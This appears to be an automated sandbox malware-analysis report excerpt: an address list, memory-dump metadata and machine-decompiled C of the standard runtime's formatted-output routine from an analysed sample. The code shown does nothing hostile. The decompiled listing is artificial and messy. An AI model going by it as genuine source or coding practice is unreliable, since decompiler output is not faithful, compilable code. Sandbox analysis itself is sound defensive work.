                            0x0042230c
                            0x00422312
                            0x0042231c
                            0x00422331
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x0042235c
                            0x00422368
                            0x0042237e
                            0x00422383
                            0x00422383
                            0x00422399
                            0x0042239e
                            0x004223a7
                            0x004223c5
                            0x004223ca
                            0x004223ca
                            0x004223d1
                            0x004224a5
                            0x004224b8
                            0x004224bd
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223e1
                            0x004223ee
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x0042240c
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x00422423
                            0x00422442
                            0x00422447
                            0x0042244a
                            0x00422459
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x0042247d
                            0x0042247d
                            0x00422496
                            0x0042249b
                            0x00000000
                            0x0042249b
                            0x00422466
                            0x004224a3
                            0x004224c0
                            0x004224c7
                            0x004224e5
                            0x004224ea
                            0x004224ea
                            0x00000000
                            0x004224c7
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421acb
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421b04
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c43
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00000000
                            0x00000000
                            0x00421ba5
                            0x00421ba5
                            0x00421bb1
                            0x00421bbe
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd5
                            0x00421be1
                            0x00421c36
                            0x00000000
                            0x00421c36
                            0x00421bc0
                            0x00421bc0
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00000000
                            0x00421bef
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e82
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f65
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f8d
                            0x00421f97
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00000000
                            0x00421ff1
                            0x00421e93
                            0x00421e93
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421d57
                            0x00421d57
                            0x00421d63
                            0x00421d70
                            0x00421e1a
                            0x00421e1d
                            0x00421e20
                            0x00421e34
                            0x00421e3a
                            0x00421e40
                            0x00421e22
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00000000
                            0x00421e42
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dcd
                            0x00421e15
                            0x00000000
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x00000000
                            0x00421e0a
                            0x00000000
                            0x0042205c
                            0x0042205c
                            0x00422066
                            0x0042206c
                            0x00422071
                            0x00422077
                            0x00422077
                            0x00000000
                            0x00000000
                            0x00422014
                            0x00422014
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00000000
                            0x00421d52
                            0x00000000
                            0x0042200b
                            0x0042200b
                            0x00000000
                            0x00000000
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421af4
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x0042215f
                            0x00422156
                            0x0042207a
                            0x0042207a
                            0x0042207a

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                            • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                            • API String ID: 3451365851-3266125857
                            • Opcode ID: db9c49ed10f7687a94a840ba406dc7d1ca4528ebe3f7370a87f193e352306527
                            • Instruction ID: 20e61ad83f853a29f1d35466c5197ba297317504c9a11d4adcbda77126cda7df
                            • Opcode Fuzzy Hash: db9c49ed10f7687a94a840ba406dc7d1ca4528ebe3f7370a87f193e352306527
                            • Instruction Fuzzy Hash: 22F14AB0E012299FDB24CF54DD89BAEB7B1BB48304F5481DAE409AB291D7785E80CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E0042389B(void* __ebx, signed int __edx, void* __edi, void* __esi) {
                            				signed int _t485;
                            				signed int _t504;
                            				void* _t509;
                            				signed int _t511;
                            				void* _t519;
                            				void* _t537;
                            				intOrPtr _t541;
                            				signed int _t558;
                            				signed short _t559;
                            				signed int _t562;
                            				signed int _t565;
                            				signed int _t566;
                            				void* _t567;
                            				signed int _t621;
                            				signed int _t623;
                            				signed int _t625;
                            				signed int _t632;
                            				signed int _t644;
                            				signed int _t671;
                            				void* _t672;
                            				void* _t673;
                            				signed int _t674;
                            				void* _t676;
                            				void* _t677;
                            				signed int _t683;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t673 = __esi;
                            					_t672 = __edi;
                            					_t621 = __edx;
                            					_t567 = __ebx;
                            					 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000040;
                            					 *(_t674 - 8) = 0xa;
                            					L150:
                            					while(1) {
                            						L150:
                            						while(1) {
                            							L150:
                            							while(1) {
                            								L150:
                            								if(( *(_t674 - 0x10) & 0x00008000) == 0) {
                            									_t623 =  *(_t674 - 0x10) & 0x00001000;
                            									if(_t623 == 0) {
                            										if(( *(_t674 - 0x10) & 0x00000020) == 0) {
                            											_t625 =  *(_t674 - 0x10) & 0x00000040;
                            											if(_t625 == 0) {
                            												_t485 = E0041C290(_t674 + 0x14);
                            												_t677 = _t676 + 4;
                            												 *(_t674 - 0x4a0) = _t485;
                            												 *(_t674 - 0x49c) = 0;
                            											} else {
                            												_t558 = E0041C290(_t674 + 0x14);
                            												_t677 = _t676 + 4;
                            												asm("cdq");
                            												 *(_t674 - 0x4a0) = _t558;
                            												 *(_t674 - 0x49c) = _t625;
                            											}
                            										} else {
                            											_t671 =  *(_t674 - 0x10) & 0x00000040;
                            											if(_t671 == 0) {
                            												_t559 = E0041C290(_t674 + 0x14);
                            												_t677 = _t676 + 4;
                            												asm("cdq");
                            												 *(_t674 - 0x4a0) = _t559 & 0x0000ffff;
                            												 *(_t674 - 0x49c) = _t671;
                            											} else {
                            												_t562 = E0041C290(_t674 + 0x14);
                            												_t677 = _t676 + 4;
                            												asm("cdq");
                            												 *(_t674 - 0x4a0) = _t562;
                            												 *(_t674 - 0x49c) = _t671;
                            											}
                            										}
                            									} else {
                            										_t565 = E0041C2B0(_t674 + 0x14);
                            										_t677 = _t676 + 4;
                            										 *(_t674 - 0x4a0) = _t565;
                            										 *(_t674 - 0x49c) = _t623;
                            									}
                            								} else {
                            									_t566 = E0041C2B0(_t674 + 0x14);
                            									_t677 = _t676 + 4;
                            									 *(_t674 - 0x4a0) = _t566;
                            									 *(_t674 - 0x49c) = _t621;
                            								}
                            								if(( *(_t674 - 0x10) & 0x00000040) == 0) {
                            									L167:
                            									 *(_t674 - 0x4a8) =  *(_t674 - 0x4a0);
                            									 *(_t674 - 0x4a4) =  *(_t674 - 0x49c);
                            									goto L168;
                            								} else {
                            									L163:
                            									_t683 =  *(_t674 - 0x49c);
                            									if(_t683 > 0 || _t683 >= 0 &&  *(_t674 - 0x4a0) >= 0) {
                            										goto L167;
                            									} else {
                            										L166:
                            										asm("adc edx, 0x0");
                            										 *(_t674 - 0x4a8) =  ~( *(_t674 - 0x4a0));
                            										 *(_t674 - 0x4a4) =  ~( *(_t674 - 0x49c));
                            										 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000100;
                            										L168:
                            										if(( *(_t674 - 0x10) & 0x00008000) == 0 && ( *(_t674 - 0x10) & 0x00001000) == 0) {
                            											 *(_t674 - 0x4a4) =  *(_t674 - 0x4a4) & 0x00000000;
                            										}
                            										if( *(_t674 - 0x30) >= 0) {
                            											 *(_t674 - 0x10) =  *(_t674 - 0x10) & 0xfffffff7;
                            											if( *(_t674 - 0x30) > 0x200) {
                            												 *(_t674 - 0x30) = 0x200;
                            											}
                            										} else {
                            											 *(_t674 - 0x30) = 1;
                            										}
                            										if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
                            											 *(_t674 - 0x1c) = 0;
                            										}
                            										 *((intOrPtr*)(_t674 - 4)) = _t674 - 0x249;
                            										while(1) {
                            											L178:
                            											_t631 =  *(_t674 - 0x30) - 1;
                            											 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
                            											if( *(_t674 - 0x30) <= 0 && ( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
                            												break;
                            											}
                            											L180:
                            											asm("cdq");
                            											_t632 =  *(_t674 - 0x4a8);
                            											 *((intOrPtr*)(_t674 - 0x494)) = E0041CE40(_t632,  *(_t674 - 0x4a4),  *(_t674 - 8), _t631) + 0x30;
                            											asm("cdq");
                            											 *(_t674 - 0x4a8) = E0041CDD0( *(_t674 - 0x4a8),  *(_t674 - 0x4a4),  *(_t674 - 8), _t632);
                            											 *(_t674 - 0x4a4) = _t632;
                            											if( *((intOrPtr*)(_t674 - 0x494)) > 0x39) {
                            												 *((intOrPtr*)(_t674 - 0x494)) =  *((intOrPtr*)(_t674 - 0x494)) +  *((intOrPtr*)(_t674 - 0x460));
                            											}
                            											 *((char*)( *((intOrPtr*)(_t674 - 4)))) =  *((intOrPtr*)(_t674 - 0x494));
                            											 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
                            										}
                            										L183:
                            										 *((intOrPtr*)(_t674 - 0x24)) = _t674 - 0x249 -  *((intOrPtr*)(_t674 - 4));
                            										 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) + 1;
                            										if(( *(_t674 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t674 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t674 - 4)))) != 0x30)) {
                            											 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) - 1;
                            											 *((char*)( *((intOrPtr*)(_t674 - 4)))) = 0x30;
                            											 *((intOrPtr*)(_t674 - 0x24)) =  *((intOrPtr*)(_t674 - 0x24)) + 1;
                            										}
                            										L187:
                            										while(1) {
                            											L187:
                            											while(1) {
                            												L187:
                            												while(1) {
                            													L187:
                            													while(1) {
                            														L187:
                            														while(1) {
                            															L187:
                            															while(1) {
                            																L187:
                            																while(1) {
                            																	do {
                            																		L187:
                            																		if( *((intOrPtr*)(_t674 - 0x28)) != 0) {
                            																			L212:
                            																			if( *(_t674 - 0x20) != 0) {
                            																				L0040C240( *(_t674 - 0x20), 2);
                            																				_t677 = _t677 + 8;
                            																				 *(_t674 - 0x20) = 0;
                            																			}
                            																			while(1) {
                            																				L214:
                            																				 *(_t674 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t674 + 0xc))));
                            																				_t580 =  *(_t674 - 0x454) & 0x0000ffff;
                            																				 *((intOrPtr*)(_t674 + 0xc)) =  *((intOrPtr*)(_t674 + 0xc)) + 2;
                            																				if(( *(_t674 - 0x454) & 0x0000ffff) == 0 ||  *(_t674 - 0x44c) < 0) {
                            																					break;
                            																				} else {
                            																					if(( *(_t674 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t674 - 0x454) & 0x0000ffff) > 0x78) {
                            																						 *(_t674 - 0x4d8) = 0;
                            																					} else {
                            																						 *(_t674 - 0x4d8) =  *(( *(_t674 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            																					}
                            																				}
                            																				L7:
                            																				 *(_t674 - 0x450) =  *(_t674 - 0x4d8);
                            																				_t644 =  *(_t674 - 0x450) * 9;
                            																				_t511 =  *(_t674 - 0x45c);
                            																				_t588 = ( *(_t644 + _t511 + 0x4083d0) & 0x000000ff) >> 4;
                            																				 *(_t674 - 0x45c) = ( *(_t644 + _t511 + 0x4083d0) & 0x000000ff) >> 4;
                            																				if( *(_t674 - 0x45c) != 8) {
                            																					L16:
                            																					 *(_t674 - 0x4e0) =  *(_t674 - 0x45c);
                            																					if( *(_t674 - 0x4e0) > 7) {
                            																						continue;
                            																					}
                            																					L17:
                            																					switch( *((intOrPtr*)( *(_t674 - 0x4e0) * 4 +  &M00423E84))) {
                            																						case 0:
                            																							L18:
                            																							 *(_t674 - 0xc) = 1;
                            																							E00423F90( *(_t674 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            																							_t677 = _t677 + 0xc;
                            																							goto L214;
                            																						case 1:
                            																							L19:
                            																							 *(__ebp - 0x2c) = 0;
                            																							__ecx =  *(__ebp - 0x2c);
                            																							 *(__ebp - 0x28) = __ecx;
                            																							__edx =  *(__ebp - 0x28);
                            																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																							__eax =  *(__ebp - 0x18);
                            																							 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            																							 *(__ebp - 0x10) = 0;
                            																							 *(__ebp - 0x30) = 0xffffffff;
                            																							 *(__ebp - 0xc) = 0;
                            																							goto L214;
                            																						case 2:
                            																							L20:
                            																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							 *(__ebp - 0x4e4) = __ecx;
                            																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																							if( *(__ebp - 0x4e4) > 0x10) {
                            																								goto L27;
                            																							}
                            																							L21:
                            																							_t59 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            																							__ecx =  *_t59 & 0x000000ff;
                            																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            																								case 0:
                            																									goto L24;
                            																								case 1:
                            																									goto L25;
                            																								case 2:
                            																									goto L23;
                            																								case 3:
                            																									goto L22;
                            																								case 4:
                            																									goto L26;
                            																								case 5:
                            																									goto L27;
                            																							}
                            																						case 3:
                            																							L28:
                            																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																								 *(__ebp - 0x18) =  *(__ebp - 0x18) * 0xa;
                            																								_t83 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																								__ecx =  *(__ebp - 0x18) * 0xa + _t83;
                            																								 *(__ebp - 0x18) = __ecx;
                            																							} else {
                            																								__edx = __ebp + 0x14;
                            																								 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x18) < 0) {
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																									__ecx =  *(__ebp - 0x18);
                            																									__ecx =  ~( *(__ebp - 0x18));
                            																									 *(__ebp - 0x18) = __ecx;
                            																								}
                            																							}
                            																							goto L214;
                            																						case 4:
                            																							L34:
                            																							 *(__ebp - 0x30) = 0;
                            																							goto L214;
                            																						case 5:
                            																							L35:
                            																							__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																								__ecx =  *(__ebp - 0x30);
                            																								__ecx =  *(__ebp - 0x30) * 0xa;
                            																								_t94 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																								__eax = __ecx + _t94;
                            																								 *(__ebp - 0x30) = __ecx + _t94;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x30) < 0) {
                            																									 *(__ebp - 0x30) = 0xffffffff;
                            																								}
                            																							}
                            																							goto L214;
                            																						case 6:
                            																							L41:
                            																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																							 *(__ebp - 0x4e8) = __ecx;
                            																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																							if( *(__ebp - 0x4e8) > 0x2e) {
                            																								L64:
                            																								goto L214;
                            																							}
                            																							L42:
                            																							_t102 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            																							__ecx =  *_t102 & 0x000000ff;
                            																							switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            																								case 0:
                            																									L47:
                            																									__ecx =  *(__ebp + 0xc);
                            																									__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            																										L50:
                            																										__ecx =  *(__ebp + 0xc);
                            																										__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																										if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            																											L53:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx & 0x0000ffff;
                            																											if(( *__ecx & 0x0000ffff) == 0x64) {
                            																												L59:
                            																												L61:
                            																												goto L64;
                            																											}
                            																											L54:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(__ecx == 0x69) {
                            																												goto L59;
                            																											}
                            																											L55:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																												goto L59;
                            																											}
                            																											L56:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx & 0x0000ffff;
                            																											if(( *__ecx & 0x0000ffff) == 0x75) {
                            																												goto L59;
                            																											}
                            																											L57:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(__ecx == 0x78) {
                            																												goto L59;
                            																											}
                            																											L58:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																												 *(__ebp - 0x45c) = 0;
                            																												goto L18;
                            																											}
                            																											goto L59;
                            																										}
                            																										L51:
                            																										__eax =  *(__ebp + 0xc);
                            																										__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																										if(__ecx != 0x32) {
                            																											goto L53;
                            																										} else {
                            																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																											goto L61;
                            																										}
                            																									}
                            																									L48:
                            																									__eax =  *(__ebp + 0xc);
                            																									__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																									if(__ecx != 0x34) {
                            																										goto L50;
                            																									} else {
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																										goto L61;
                            																									}
                            																								case 1:
                            																									L62:
                            																									__ecx =  *(__ebp - 0x10);
                            																									__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																									 *(__ebp - 0x10) = __ecx;
                            																									goto L64;
                            																								case 2:
                            																									L43:
                            																									__edx =  *(__ebp + 0xc);
                            																									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
                            																									} else {
                            																										__ecx =  *(__ebp + 0xc);
                            																										__ecx =  *(__ebp + 0xc) + 2;
                            																										 *(__ebp + 0xc) = __ecx;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																									}
                            																									goto L64;
                            																								case 3:
                            																									L63:
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									goto L64;
                            																								case 4:
                            																									goto L64;
                            																							}
                            																						case 7:
                            																							goto L65;
                            																						case 8:
                            																							L24:
                            																							__ecx =  *(__ebp - 0x10);
                            																							__ecx =  *(__ebp - 0x10) | 0x00000002;
                            																							 *(__ebp - 0x10) = __ecx;
                            																							goto L27;
                            																						case 9:
                            																							L25:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							goto L27;
                            																						case 0xa:
                            																							L23:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            																							goto L27;
                            																						case 0xb:
                            																							L22:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							goto L27;
                            																						case 0xc:
                            																							L26:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
                            																							goto L27;
                            																						case 0xd:
                            																							L27:
                            																							goto L214;
                            																					}
                            																				} else {
                            																					_t642 = 0;
                            																					if(0 == 0) {
                            																						 *(_t674 - 0x4dc) = 0;
                            																					} else {
                            																						 *(_t674 - 0x4dc) = 1;
                            																					}
                            																					 *(_t674 - 0x46c) =  *(_t674 - 0x4dc);
                            																					if( *(_t674 - 0x46c) == 0) {
                            																						_push(L"(\"Incorrect format specifier\", 0)");
                            																						_push(0);
                            																						_push(0x460);
                            																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																						_push(2);
                            																						_t519 = L0040E1A0();
                            																						_t677 = _t677 + 0x14;
                            																						if(_t519 == 1) {
                            																							asm("int3");
                            																						}
                            																					}
                            																					L14:
                            																					if( *(_t674 - 0x46c) != 0) {
                            																						goto L16;
                            																					} else {
                            																						 *((intOrPtr*)(L0040EC70(_t588))) = 0x16;
                            																						E00411A50(_t567, _t588, _t672, _t673, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            																						 *(_t674 - 0x4c8) = 0xffffffff;
                            																						E0040D380(_t674 - 0x40);
                            																						_t504 =  *(_t674 - 0x4c8);
                            																						L225:
                            																						return E00416CA0(_t504, _t567,  *(_t674 - 0x48) ^ _t674, _t642, _t672, _t673);
                            																					}
                            																				}
                            																			}
                            																			L215:
                            																			if( *(_t674 - 0x45c) == 0 ||  *(_t674 - 0x45c) == 7) {
                            																				 *(_t674 - 0x4f8) = 1;
                            																			} else {
                            																				 *(_t674 - 0x4f8) = 0;
                            																			}
                            																			_t642 =  *(_t674 - 0x4f8);
                            																			 *(_t674 - 0x4bc) =  *(_t674 - 0x4f8);
                            																			if( *(_t674 - 0x4bc) == 0) {
                            																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            																				_push(0);
                            																				_push(0x8f5);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				_t509 = L0040E1A0();
                            																				_t677 = _t677 + 0x14;
                            																				if(_t509 == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(_t674 - 0x4bc) != 0) {
                            																				 *(_t674 - 0x4d4) =  *(_t674 - 0x44c);
                            																				E0040D380(_t674 - 0x40);
                            																				_t504 =  *(_t674 - 0x4d4);
                            																			} else {
                            																				 *((intOrPtr*)(L0040EC70(_t580))) = 0x16;
